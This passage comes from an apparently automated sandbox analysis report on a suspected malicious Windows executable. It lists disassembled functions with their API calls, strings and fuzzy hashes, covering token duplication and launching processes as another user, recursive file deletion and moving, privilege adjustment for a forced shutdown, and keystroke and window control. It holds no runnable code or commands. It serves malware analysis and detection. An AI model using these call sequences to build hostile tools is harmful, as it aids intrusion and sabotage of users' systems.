                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                        • String ID: Shell_TrayWnd
                                                                                                        • API String ID: 2889586943-2988720461
                                                                                                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                        • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                        Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                        • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                        • _wcslen.LIBCMT ref: 00446498
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                        • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                        • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                        • String ID: $@OH$default$winsta0
                                                                                                        • API String ID: 3324942560-3791954436
                                                                                                        • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                        • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                        Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                          • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                        • _wcscat.LIBCMT ref: 0044BD94
                                                                                                        • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                        • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                        • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                        • _wcscat.LIBCMT ref: 0044BE83
                                                                                                        • _wcscat.LIBCMT ref: 0044BE95
                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                        • String ID: \*.*
                                                                                                        • API String ID: 2188072990-1173974218
                                                                                                        • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                        • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                        • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                        • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                        Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                        • __swprintf.LIBCMT ref: 004789D3
                                                                                                        • __swprintf.LIBCMT ref: 00478A1D
                                                                                                        • __swprintf.LIBCMT ref: 00478A4B
                                                                                                        • __swprintf.LIBCMT ref: 00478A79
                                                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                        • __swprintf.LIBCMT ref: 00478AA7
                                                                                                        • __swprintf.LIBCMT ref: 00478AD5
                                                                                                        • __swprintf.LIBCMT ref: 00478B03
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                        • API String ID: 999945258-2428617273
                                                                                                        • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                        • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                        Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                        • __wsplitpath.LIBCMT ref: 00403492
                                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                        • _wcscpy.LIBCMT ref: 004034A7
                                                                                                        • _wcscat.LIBCMT ref: 004034BC
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                        • _wcscpy.LIBCMT ref: 004035A0
                                                                                                        • _wcslen.LIBCMT ref: 00403623
                                                                                                        • _wcslen.LIBCMT ref: 0040367D
                                                                                                        Strings
                                                                                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                        • Error opening the file, xrefs: 00428231
                                                                                                        • Unterminated string, xrefs: 00428348
                                                                                                        • _, xrefs: 0040371C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                        • API String ID: 3393021363-188983378
                                                                                                        • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                        • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                        • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                        • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                        Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                        • String ID: *.*
                                                                                                        • API String ID: 1409584000-438819550
                                                                                                        • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                        • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                        • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                        • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                        Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                        • __swprintf.LIBCMT ref: 00431C2E
                                                                                                        • _wcslen.LIBCMT ref: 00431C3A
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                        • String ID: :$\$\??\%s
                                                                                                        • API String ID: 2192556992-3457252023
                                                                                                        • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                        • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                        • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                        • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                        Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                        • __swprintf.LIBCMT ref: 004722B9
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FolderPath$LocalTime__swprintf
                                                                                                        • String ID: %.3d
                                                                                                        • API String ID: 3337348382-986655627
                                                                                                        • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                        • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                        • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                        • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                        Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                        • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                        • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                        • String ID: *.*
                                                                                                        • API String ID: 2640511053-438819550
                                                                                                        • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                        • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                        • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                        • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                        Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                        • GetLastError.KERNEL32 ref: 00433414
                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                        • API String ID: 2938487562-3733053543
                                                                                                        • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                        • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                        • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                        • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                        Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
